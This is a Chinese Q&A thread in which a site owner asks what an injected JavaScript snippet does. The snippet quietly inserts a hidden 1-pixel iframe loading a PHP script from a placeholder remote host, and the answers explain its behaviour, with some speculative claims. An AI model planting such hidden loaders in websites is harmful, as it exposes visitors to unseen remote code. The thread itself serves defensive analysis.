2

这个恶意 javascript 代码到底在做什么?

(function () {
    var qk = document.createElement('iframe');

    qk.src = 'http://xxx.tld/wp-includes/dtd.php';
    qk.style.position = 'absolute';
    qk.style.border = '0';
    qk.style.height = '1px';
    qk.style.width = '1px';
    qk.style.left = '1px';
    qk.style.top = '1px';

    if (!document.getElementById('qk')) {
        document.write('<div id=\'qk\'></div>');
        document.getElementById('qk').appendChild(qk);
    }
})();

该网站http://xxx.tld/wp-includes/dtd.php刚刚返回OK。

4

3 回答 3

5

这是:

(function () {
    var qk = document.createElement('iframe');  // creating an iframe

    qk.src = 'http://xxx.tld/wp-includes/dtd.php';  // pointing it at a webpage

    /*
    making the iframe only take up a 1px by 1px square
    in the top left-hand corner of the web page it is injected into
    */
    qk.style.position = 'absolute';
    qk.style.border = '0';
    qk.style.height = '1px';
    qk.style.width = '1px';
    qk.style.left = '1px';
    qk.style.top = '1px';

    /*
    Adding the iframe to the DOM by creating a <div> with an ID of "qt"
    (If the div has not been created already)
    */    
    if (!document.getElementById('qk')) {
        document.write('<div id=\'qk\'></div>');
        document.getElementById('qk').appendChild(qk);
    }
})();

当 iframe 被注入 DOM 时,浏览器会向http://xxx.tld/etc. 这样做很可能是为了跟踪您网站上的点击量。

于 2013-04-05T03:29:45.913 回答
0

它打开一个 iframe 并运行一个 php 脚本。

其中可能包含谁知道什么。

此外,它似乎需要存在一个 id 为 qk 的 div。也许注入其他不良代码。

于 2013-04-05T03:29:00.733 回答
0

它可能是在您的浏览器或 js 代码中注入恶意 iframe 或 cookie(甚至可能是 supercookie)。我认为它还可以通过将屏幕高度、宽度和长度设置为 1 像素来禁用使用 X 关闭选项卡。

于 2022-02-19T10:50:12.867 回答